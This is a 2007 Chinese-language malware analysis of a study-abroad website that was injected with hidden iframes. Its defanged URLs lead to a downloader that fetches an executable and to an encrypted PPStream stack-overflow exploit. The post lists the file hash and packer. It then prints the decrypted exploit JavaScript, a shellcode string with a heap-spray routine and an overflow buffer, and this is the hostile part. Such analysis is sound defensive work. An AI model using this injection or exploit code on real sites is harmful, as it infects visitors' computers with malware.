某留学网站被植入利用 PPStream 堆栈漏洞的代码

某留学网站被植入利用 PPStream 堆栈漏洞的代码

endurer 原创
2007-09-30 第1版

网站被植入代码：
/---
＜iframe src=hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 width=0 height=0＞＜/iframe＞
---/

hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 包含代码：
/---
＜iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/014.htm'＞＜/iframe＞
＜iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/pps.htm'＞＜/iframe＞
---/

hxxp://xxx.7**45*97**0.com/wm/014.htm 下载 hxxp://down.d*j**7*78*8.cn/eeee.exe，创建 eeee.vbs 来实现运行。

文件说明符 : D:/test/eeee.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-30 17:35:3
修改时间 : 2007-9-30 17:34:56
访问时间 : 2007-9-30 17:36:41
大小 : 18944 字节 18.512 KB
MD5 : 711db0f8a651b3877db9febfa4060cdb
HSA1: ECA7F2889F07E04257575EEEAC9AB30F97EC7311

UPX 0.89.6 - 1.02 / 1.05 - 1.24 -＞ Markus & Laszlo

hxxp://xxx.7**45*97**0.com/wm/pps.htm　是一段加密过的 PPStream 堆栈漏洞利用代码，解密后为：
/---
ｖａｒ ｎｅｗｃｏｄｅ＝ｕｎｅｓｃａｐｅ（"％ｕ００Ｅ８％ｕ００００％ｕ６Ａ００％ｕＥＢ……％ｕ７７６ｆ％ｕ２ｅ６ｅ％ｕ６ａ６４％ｕ３７３７％ｕ３８３８％ｕ６３２ｅ％ｕ２ｆ６ｅ％ｕ７０７０％ｕ２ｅ７３％ｕ７８６５％ｕ００６５"）;ｂｉｇｂｌｏｃｋ＝ｕｎｅｓｃａｐｅ（"％ｕ９０９０"）;ｈｅａｄｅｒｓｉｚｅ＝２０;ｓｌａｃｋｓｐａｃｅ＝ｈｅａｄｅｒｓｉｚｅ＋ｎｅｗｃｏｄｅ．ｌｅｎｇｔｈ;ｗｈｉｌｅ（ｂｉｇｂｌｏｃｋ．ｌｅｎｇｔｈ＜ｓｌａｃｋｓｐａｃｅ）ｂｉｇｂｌｏｃｋ＋＝ｂｉｇｂｌｏｃｋ;ｆｉｌｌｂｌｏｃｋ＝ｂｉｇｂｌｏｃｋ．ｓｕｂｓｔｒｉｎｇ（０,ｓｌａｃｋｓｐａｃｅ）;ｂｌｏｃｋ＝ｂｉｇｂｌｏｃｋ．ｓｕｂｓｔｒｉｎｇ（０,ｂｉｇｂｌｏｃｋ．ｌｅｎｇｔｈ－ｓｌａｃｋｓｐａｃｅ）;ｗｈｉｌｅ（ｂｌｏｃｋ．ｌｅｎｇｔｈ＋ｓｌａｃｋｓｐａｃｅ＜０ｘ４００００）ｂｌｏｃｋ＝ｂｌｏｃｋ＋ｂｌｏｃｋ＋ｆｉｌｌｂｌｏｃｋ;ｍｅｍｏｒｙ＝ｎｅｗ Ａｒｒａｙ（）;ｆｏｒ（ｘ＝０;ｘ＜４００;ｘ＋＋）ｍｅｍｏｒｙ［ｘ］＝ｂｌｏｃｋ＋ｎｅｗｃｏｄｅ;ｖａｒ ｂｕｆｆｅｒ＝'＼ｘ０ａ';ｗｈｉｌｅ（ｂｕｆｆｅｒ．ｌｅｎｇｔｈ＜５００）ｂｕｆｆｅｒ＋＝'＼ｘ０ａ＼ｘ０ａ＼ｘ０ａ＼ｘ０ａ';ｐｐｃ．Ｌｏｇｏ＝ｂｕｆｆｅｒ;
---/